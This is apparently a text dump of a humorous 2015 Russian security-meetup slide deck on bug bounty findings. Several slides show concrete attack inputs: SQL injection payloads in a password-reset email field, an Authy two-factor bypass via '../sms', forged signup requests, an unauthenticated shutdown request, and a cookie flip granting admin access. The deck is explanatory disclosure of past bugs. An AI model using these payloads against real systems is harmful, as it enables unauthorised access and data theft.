Дмитрий Bo0oM Бумов, Security Meetup 9 апреля, Mail.Ru Group
•Download as PPS, PDF•
1 like•1,661 views
Дмитрий Bo0oM Бумов, один из наиболее активных хакеров bug bounty программы Mail.Ru Group и участник других программ поиска уязвимостей, со свойственным ему неподражаемым остроумием рассказал о том, что искать баги – это не только сложно, но и весело. Кроме того, он подробно разобрал самые необычные из найденных им экземпляров.
Дмитрий Bo0oM Бумов, Security Meetup 9 апреля, Mail.Ru Group
- 1. learnppt.com LOGO Ты такой смешной!!!1!))00) Весёлые (и не очень) баги и взломы 9 апреля 2015 #securitymeetup
- 2. ПРЕДУПРЕЖДЕНИЕ! Последующие слайды содержат сцены сексуального насилия над web-приложениями и програмным обеспечением различной тематики и направленности. Копирование и воспроизведение векторов атак карается 272 статьей Уголовного кодекса Российской Федерации, хотя такие экземпляры ещё и найти надо, так что можете попробовать, но если что, я вас предупреждал! Ну вы поняли...
- 3. 3 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO Время интересных ИСТОРИЙ #securitymeetup
- 4. 4 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @isox_xx #securitymeetup
- 5. 5 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO GET /shutdown/ HTTP/1.1 Host: up-fotki.yandex.ru User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://fotki.yandex.ru/upload?force=js Cервак выключается... https://up-fotki.yandex.ru/shutdown/ @isox_xx #securitymeetup
- 6. 6 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @isox_xx #securitymeetup
- 7. 7 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @isox_xx #securitymeetup
- 8. 8 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @isox_xx #securitymeetup
- 9. 9 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @webpentest POST /signup/claim/id*/ HTTP/1.1 ... CSRF=bLJtKc0uLGGWoBkKhNMJCXGt0mhlhHiw&email=email@example.com&p assword=test&login=MyLogin POST /signup/claim/WMkiheTT-8kRslImVLWMVw/ HTTP/1.1 ... CSRF=bLJtKc0uLGGWoBkKhNMJCXGt0mhlhHiw&email=email@example.com&p assword=test&login=Administrator Регистрация курильщика: Регистрация здорового человека: *Где id - уникальный идентификатор, который берётся... На странице существующего пользователя #securitymeetup
- 10. 10 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @webpentest Уже существует пользователь? Не беда! В итоге перекидывает в админку сервиса с "свежереганным" логином. #securitymeetup
- 11. 11 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @4rt3m #securitymeetup
- 12. 12 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @4rt3m #securitymeetup
- 13. 13 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup
- 14. 14 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @fb1h2s @msecnet #securitymeetup
- 15. 15 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @homakov #securitymeetup
- 16. 16 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @homakov 1. Вводим ../sms в поле токена 2. Клиент кодирует это как ..%2fsms и делает запрос на api.authy.com/protected/json/verify/..%2fsms/authy_id 3. path_traversal декодирует полученный URL на раннем этапе в api.authy.com/protected/json/verify/../sms/authy_id, делит все по / и удаляет директорию /verify 4. Теперь само приложение получает модифицированный путь api.authy.com/protected/json/sms/authy_id который посылает СМС жертве и возвращает 200 статус и ответом {«success»:true,«message»:«SMS token was sent», «cellphone»:"+1-XXX-XXX-XX85"} 5. Наш клиент который хотел проверить наш токен видит 200 статус и делает вывод что токен правильный. Даже если используется кастомная реализация API, клиент скорее всего ищет success=true что в нашем ответе тоже присутствует. Попросту говоря введя ../sms в поле токена можно было обойти двух факторную аутенфикацию на всех сайтах использующих Authy. #securitymeetup
- 17. 17 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup
- 18. 18 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup
- 19. 19 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @fgkm_ Когда имя пользователя в url #securitymeetup
- 20. 20 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @Black2Fan RCE В ФОРМИРОВАНИИ CSS ФАЙЛА!!!!!11!!!!!адин!! #securitymeetup
- 21. 21 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO Root, пароль для слабаков! #securitymeetup
- 22. 22 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @d90andrew Восстановление пароля. Поле для email'а: my@gmail.com' and 'a'='a# - письмо приходит my@gmail.com' and 'a'='b# - не отправляется my@gmail.com' union select 1,2,3,4,5,6# #securitymeetup
- 23. 23 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @d90andrew my@gmail.com' union select 1,2,3,concat_ws(0x3a,version(),database()),5,6# #securitymeetup
- 24. 24 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @d90andrew Пара часов и база пользователей в кармане! Точнее в почте... #securitymeetup
- 25. 25 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup
- 26. 26 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO ЧОЭТА? #securitymeetup
- 27. 27 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @asintsov Привет, сервак, как жизнь? Как дети? Форкаешься еще? Если ты ADMIN, то хэш твоего пароля XXXXXXX! Ты уверен, что у твоего пароля такой хэш? Ну ты скажешь! Конечно! У меня такой же хэш и получился! Админ я или кто, по-твоему! Ну раз Админ, то проходи! Ну привет, клиентик. Ты сам-то чьих будешь? Ну как же это? Админ я, Админ! Соединение установлено. Текущий пользователь: ADMIN Самая крутая СУБД в мире - OpenEdge #securitymeetup
- 28. 28 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO ЧТОЧТО ЗАЗА херняхерня туттут ПРОИСХОДИТ??ПРОИСХОДИТ?? #securitymeetup
- 29. 29 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO Были подобраны файлы и папки: • /image/ • /css/ • /js/ • /index.php • /login.php • /logout.php #securitymeetup
- 30. 30 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO GET /logout.php HTTP/1.1 Host: *******.ru HTTP/1.1 200 Ok Server: nginx Date: Dec, 29 Apr 1970 13:14:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Cache-Control: no-cache,no-store,max-age=0,must-revalidate Set-Cookie: 7ed93bc3576665339e899f356890fa5e=false; Path=/ Запрос: Ответ: #securitymeetup
- 31. 31 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO GET /index.php HTTP/1.1 Host: *******.ru Cookie: 7ed93bc3576665339e899f356890fa5e=true Запрос: Добро пожаловать в панель администратора! ииииииииии... #securitymeetup
- 32. 32 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO А бывает наоборот... #securitymeetup
- 33. 33 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup Bo0oM @i_bo0om Пишу лучше чем говорю (инфа сотка)
- 34. 34 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup СДАЛСДАЛ ИГЭИГЭ ??http://goo.gl/TxxCi3